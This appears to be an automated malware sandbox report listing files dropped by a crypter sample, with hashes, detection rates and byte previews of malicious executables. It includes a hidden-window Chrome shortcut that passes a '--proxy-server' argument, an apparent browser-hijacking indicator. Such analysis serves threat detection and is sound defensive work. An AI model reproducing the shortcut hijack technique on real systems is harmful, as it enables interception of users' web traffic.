                                                                                                                                                                                                                                        SHA1:469ED7D853D590E90F05BDF77AF114B84C88DE2C
                                                                                                                                                                                                                                        SHA-256:D4DF1ABA83289161D578336E1B7B6DAF7269BB73ACC92BD9DFA2C262EBC6C4D2
                                                                                                                                                                                                                                        SHA-512:80DF5D568E34DFC086F546E8D076749E58A7230ED1AA33F3A5C9D966809BECADC9922317095032D6E6A7ECDFBFBCE02A72CC82513AB0D132C5FFA6C07682BD87
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 64%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....+.f..........#.................]p.........@.............................`............ .....................................................<....P......@...`*...........................................F..(.......8............... ............................text...6........................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0..p.-......................... ..`.text1..X...........................@....text2...`.......b..................`..h.rsrc........P.......h..............@..@........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):685392
                                                                                                                                                                                                                                        Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1075200
                                                                                                                                                                                                                                        Entropy (8bit):7.828820550765554
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:WdYRGW0Hr/0s93L2wy3Dz39bQw4D68c1y3wYx0DRTejblcicS32UxibH:6YRGWYJqw0DL9swKw18wG0DRTejblci0
                                                                                                                                                                                                                                        MD5:8C8AF20BF6536903C1D042CEBEDE6475
                                                                                                                                                                                                                                        SHA1:8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
                                                                                                                                                                                                                                        SHA-256:B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
                                                                                                                                                                                                                                        SHA-512:8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 33%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r)..p~....o-...(......t.....+..*Vs....(/...t.........*..(0...*.0..........
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1075200
                                                                                                                                                                                                                                        Entropy (8bit):7.828820550765554
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:WdYRGW0Hr/0s93L2wy3Dz39bQw4D68c1y3wYx0DRTejblcicS32UxibH:6YRGWYJqw0DL9swKw18wG0DRTejblci0
                                                                                                                                                                                                                                        MD5:8C8AF20BF6536903C1D042CEBEDE6475
                                                                                                                                                                                                                                        SHA1:8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
                                                                                                                                                                                                                                        SHA-256:B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
                                                                                                                                                                                                                                        SHA-512:8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 33%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r)..p~....o-...(......t.....+..*Vs....(/...t.........*..(0...*.0..........
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):608080
                                                                                                                                                                                                                                        Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):450024
                                                                                                                                                                                                                                        Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2046288
                                                                                                                                                                                                                                        Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):257872
                                                                                                                                                                                                                                        Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Thu Oct 5 08:16:12 2023, atime=Wed Sep 27 08:36:54 2023, length=3242272, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2104
                                                                                                                                                                                                                                        Entropy (8bit):3.458789649178605
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8SEdYT5H0lRYrnvPdAKRkdAGdAKRFdAKRz:8SDx7
                                                                                                                                                                                                                                        MD5:8EF053B55C8F1044FAB725C8DD6745A1
                                                                                                                                                                                                                                        SHA1:EECBFE81201BB3E26A3C2DB0ABB130084CE5E2FE
                                                                                                                                                                                                                                        SHA-256:A8A2FEF79CA2A22652A4F8D4408A833E5B65BB7B3C20AC33C0A5CB0737530C27
                                                                                                                                                                                                                                        SHA-512:942D2543593D5E7EF73CEAF6A4115D51206DD3F7A81E622659EA0AC991E81FAF335F38B4B692FC1DDE7F369DE211FA2DD8A2A5C2925CFC800A828DDDF23A2AAA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.@.. ......,.......l....X.&&... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.IEW.I....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VEW.F....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.VEW.F....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.VEW.F.............................A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.L .chrome.exe..F......CW.VEW.I..........................l...c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1075200
                                                                                                                                                                                                                                        Entropy (8bit):7.828820550765554
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:WdYRGW0Hr/0s93L2wy3Dz39bQw4D68c1y3wYx0DRTejblcicS32UxibH:6YRGWYJqw0DL9swKw18wG0DRTejblci0
                                                                                                                                                                                                                                        MD5:8C8AF20BF6536903C1D042CEBEDE6475
                                                                                                                                                                                                                                        SHA1:8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
                                                                                                                                                                                                                                        SHA-256:B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
                                                                                                                                                                                                                                        SHA-512:8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 33%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r)..p~....o-...(......t.....+..*Vs....(/...t.........*..(0...*.0..........
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):425
                                                                                                                                                                                                                                        Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                        MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                        SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                        SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                        SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):425
                                                                                                                                                                                                                                        Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                        MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                        SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                        SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                        SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):425
                                                                                                                                                                                                                                        Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                        MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                        SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                        SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                        SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1119
                                                                                                                                                                                                                                        Entropy (8bit):5.345080863654519
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                                                                                                                                                                                        MD5:88593431AEF401417595E7A00FE86E5F
                                                                                                                                                                                                                                        SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                                                                                                                                                                                        SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                                                                                                                                                                                        SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):522
                                                                                                                                                                                                                                        Entropy (8bit):5.358731107079437
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                                                                                                                                                                                                        MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                                                                                                                                                                                                        SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
